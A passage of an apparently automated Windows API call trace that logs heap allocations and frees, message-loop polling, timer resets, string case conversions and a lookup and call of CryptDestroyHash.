| out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2748 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac048 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf28 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac000 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfd0 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac018 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac150 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0158.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0158.674] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0158.674] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0158.674] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0158.674] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0158.674] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0158.674] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2738 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2748 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac150 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac018 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0158.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfd0 [0158.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0158.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfd0 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac018 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac150 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2748 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: hHeap=0x25c0000) returned 1 [0158.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0158.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0158.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2738 [0158.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac150 [0158.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac018 [0158.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfd0 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfd0 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac018 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac150 | out: hHeap=0x25c0000) returned 1 [0158.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf70 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf88 | out: hHeap=0x25c0000) returned 1 [0158.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2638 [0158.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2738 [0158.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf88 [0158.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf70 [0158.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac150 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac150 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf70 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf88 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfa0 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abef8 | out: hHeap=0x25c0000) returned 1 [0158.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0158.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0158.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2638 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abef8 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfa0 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2738 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf88 [0158.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: hHeap=0x25c0000) returned 1 [0158.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf88 | out: hHeap=0x25c0000) returned 1 [0158.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfa0 | out: hHeap=0x25c0000) returned 1 [0158.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abef8 | out: hHeap=0x25c0000) returned 1 [0158.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0158.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abef8 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24abfa0 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24abf88 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24abf70 [0158.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac150 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac018 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0158.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abef8 | out: hHeap=0x25c0000) returned 1 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24abef8 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24abfd0 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac000 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf28 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac048 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0158.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24abe20 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab088 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac1c8 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac138 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1b0 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac120 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac078 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac198 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac210 [0158.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac0f0 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac090 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2638 [0158.679] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0158.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0158.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac270 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0158.679] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2638 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2738 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abe50 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac060 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1e0 [0158.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2698 [0158.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0158.679] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1e0 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac060 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe50 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0158.680] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0158.680] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0158.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2638 [0158.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2738 [0158.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abe50 [0158.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac060 [0158.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1e0 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1e0 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac060 | out: hHeap=0x25c0000) returned 1 [0158.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe50 | out: hHeap=0x25c0000) returned 1 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: hHeap=0x25c0000) returned 1 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac270 | out: hHeap=0x25c0000) returned 1 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac270 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abe50 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac060 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1e0 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac228 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac240 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0158.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac0f0 | out: hHeap=0x25c0000) returned 1 [0158.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac0f0 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0158.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1f8 [0158.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2b8 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2638 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2738 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac168 [0158.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2b8 | out: hHeap=0x25c0000) returned 1 [0158.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac168 | out: hHeap=0x25c0000) returned 1 [0158.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: hHeap=0x25c0000) returned 1 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac168 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2738 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2b8 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2638 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2698 [0158.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac288 [0158.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2b8 | out: hHeap=0x25c0000) returned 1 [0158.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2638 | out: hHeap=0x25c0000) returned 1 [0158.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac288 | out: hHeap=0x25c0000) returned 1 [0158.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac288 [0158.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2698 [0158.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0158.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0158.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0158.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac288 | out: hHeap=0x25c0000) returned 1 [0158.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b57c0 [0158.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0158.683] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0158.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b57c0 | out: hHeap=0x25c0000) returned 1 [0158.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac288 [0158.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2698 [0158.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2698 | out: hHeap=0x25c0000) returned 1 [0158.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac288 | out: hHeap=0x25c0000) returned 1 [0158.684] CryptDestroyHash (hHash=0xaa55e0) returned 1 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2698 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2638 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac288 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2b8 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac258 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2748 [0158.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac258 | out: hHeap=0x25c0000) returned 1 [0158.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2748 | out: hHeap=0x25c0000) returned 1 [0158.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2b8 | out: hHeap=0x25c0000) returned 1 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2b8 [0158.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac258 [0158.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2d0 [0158.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2748 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2d0 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2748 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac258 | out: hHeap=0x25c0000) returned 1 [0158.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2738 | out: 